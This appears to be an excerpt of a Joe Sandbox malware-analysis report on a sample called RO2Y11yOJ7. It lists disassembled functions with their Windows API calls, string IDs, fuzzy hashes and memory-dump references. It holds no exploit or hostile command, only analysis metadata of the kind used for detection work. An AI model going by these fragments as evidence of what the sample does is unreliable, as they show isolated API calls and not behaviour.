                                                          • Instruction ID: dbf99edd04daaae43d7b4d44098f05d58d75fb7a83c9855173d2694dfa67e041
                                                          • Opcode Fuzzy Hash: 443f3568fcc2ccd95c11168738d7765dd6425963d2de896ab01318189518cf1d
                                                          • Instruction Fuzzy Hash: 05012D72D04218BEDB29CBA8CC16EFE7BFCDB01301F00459EF552D6181E9B4E6048760
                                                          Function 00398FBF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00347F41: _memmove.LIBCMT ref: 00347F82
                                                            • Part of subcall function 0039AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 0039AEC7
                                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 0039902D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameSend_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 372448540-1403004172
                                                          • Opcode ID: 67f80a3174877e5b0b2789775531cdd05a2f37db62e6af5924c97d1917e676fd
                                                          • Instruction ID: d1423376718e0698579d3e5c780b4885ae03ed47ba09b4e8ca81c4025b946e08
                                                          • Opcode Fuzzy Hash: 67f80a3174877e5b0b2789775531cdd05a2f37db62e6af5924c97d1917e676fd
                                                          • Instruction Fuzzy Hash: 7401A771A451086BDF17E7A4CC96EFE73ACDF15340F14011AB9126B292DE256E0C96B1
                                                          Function 00399044 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00347F41: _memmove.LIBCMT ref: 00347F82
                                                            • Part of subcall function 0039AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 0039AEC7
                                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 003990B0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameSend_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 372448540-1403004172
                                                          • Opcode ID: b5566db7378f88f02681088504590bd1373a52d1f1b4caef13f5f61bed1cc83d
                                                          • Instruction ID: 8e9ec3a34c928c027e3f76ba1292063531367ce1693964543a90d01429dc4f23
                                                          • Opcode Fuzzy Hash: b5566db7378f88f02681088504590bd1373a52d1f1b4caef13f5f61bed1cc83d
                                                          • Instruction Fuzzy Hash: 1A01D671A451196BDF03E7A8CD86EFE73AC9F15340F14011AB9126B392DA266E0C92B2
                                                          Function 0039C7AD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 0039C7F6
                                                            • Part of subcall function 0039CB06: _memmove.LIBCMT ref: 0039CB50
                                                            • Part of subcall function 0039CB06: VariantInit.OLEAUT32(00000000), ref: 0039CB72
                                                            • Part of subcall function 0039CB06: VariantCopy.OLEAUT32(00000000,?), ref: 0039CB7C
                                                          • VariantClear.OLEAUT32(?), ref: 0039C818
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Variant$Init$ClearCopy_memmove
                                                          • String ID: d}?
                                                          • API String ID: 2932060187-2624098408
                                                          • Opcode ID: f86795ce381186f7d46f6397c8ac1ef6f6fd8354457fe9de7489e45db1c322ee
                                                          • Instruction ID: ae422c172b9f934338932fdf3ce3f57181a56c2bdfe9bff0b1f4cddfb6edf7b4
                                                          • Opcode Fuzzy Hash: f86795ce381186f7d46f6397c8ac1ef6f6fd8354457fe9de7489e45db1c322ee
                                                          • Instruction Fuzzy Hash: 7F110C719007089FC721DFAAD88499BF7F8FF08310B50862FE54ADB611E771AA44CB90
                                                          Function 003A4FCF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ClassName_wcscmp
                                                          • String ID: #32770
                                                          • API String ID: 2292705959-463685578
                                                          • Opcode ID: 9c7a31cea5d7ef153efdec1848801b6e80a7fdc804a3503c8a0789ce3cdeb064
                                                          • Instruction ID: 90b74892ea76293311a841077da27d49300e21681706703ce6b31aff45bfec85
                                                          • Opcode Fuzzy Hash: 9c7a31cea5d7ef153efdec1848801b6e80a7fdc804a3503c8a0789ce3cdeb064
                                                          • Instruction Fuzzy Hash: 97E02232A002292BD3209B99AC09EA7FBACEB42760F010026FD04D7050DA60AA018BE0
                                                          Function 0037B441 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0037B494: _memset.LIBCMT ref: 0037B4A1
                                                            • Part of subcall function 00360AC0: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0037B470,?,?,?,0034100A), ref: 00360AC5
                                                          • IsDebuggerPresent.KERNEL32(?,?,?,0034100A), ref: 0037B474
                                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0034100A), ref: 0037B483
                                                          Strings
                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0037B47E
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                          • API String ID: 3158253471-631824599
                                                          • Opcode ID: 142b6ff1d7d6a92454d35996cda722fcaadb04ad4bdfd3018e028e0e56f68f62
                                                          • Instruction ID: abca28eee9ee41ca1d2c4d10247002ded2b947016fd57df895100d2a0f0ab71d
                                                          • Opcode Fuzzy Hash: 142b6ff1d7d6a92454d35996cda722fcaadb04ad4bdfd3018e028e0e56f68f62
                                                          • Instruction Fuzzy Hash: 99E06D78200B608FD3329F6AE908743BBE8AF00304F05CA6CE446C6241EBB8E444CBA1
                                                          Function 003C59CD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003C59D7
                                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 003C59EA
                                                            • Part of subcall function 003A52EB: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003A5363
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: FindMessagePostSleepWindow
                                                          • String ID: Shell_TrayWnd
                                                          • API String ID: 529655941-2988720461
                                                          • Opcode ID: fd0634120f434e78e665b300b7f3dd60f40ad2d6c6d6f92f6b8d6ccb45915530
                                                          • Instruction ID: bb40389e92f148a4eda5284e9ea3cdc8adbcd9f15745e965cfb8f57ff49ab95d
                                                          • Opcode Fuzzy Hash: fd0634120f434e78e665b300b7f3dd60f40ad2d6c6d6f92f6b8d6ccb45915530
                                                          • Instruction Fuzzy Hash: 60D0C931384711BBE669AB709C0BFE66A19AB05B50F000825B759EA1D0C9E4A8008754
                                                          Function 003C5A01 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003C5A17
                                                          • PostMessageW.USER32(00000000), ref: 003C5A1E
                                                            • Part of subcall function 003A52EB: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003A5363
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: FindMessagePostSleepWindow
                                                          • String ID: Shell_TrayWnd
                                                          • API String ID: 529655941-2988720461
                                                          • Opcode ID: 651dee8391d7a9c0738656f31b83133babc6a4cb39d11992fb313c6628a2055b
                                                          • Instruction ID: 9239f6669f0ed56302118e6a09ac5c0f75b96de217df9b0744be4a86d5bedd3e
                                                          • Opcode Fuzzy Hash: 651dee8391d7a9c0738656f31b83133babc6a4cb39d11992fb313c6628a2055b
                                                          • Instruction Fuzzy Hash: AAD0C9313C07117BE66AAB709C0BFD66A19AB06B50F000825B755EA1D0C9E4B8008758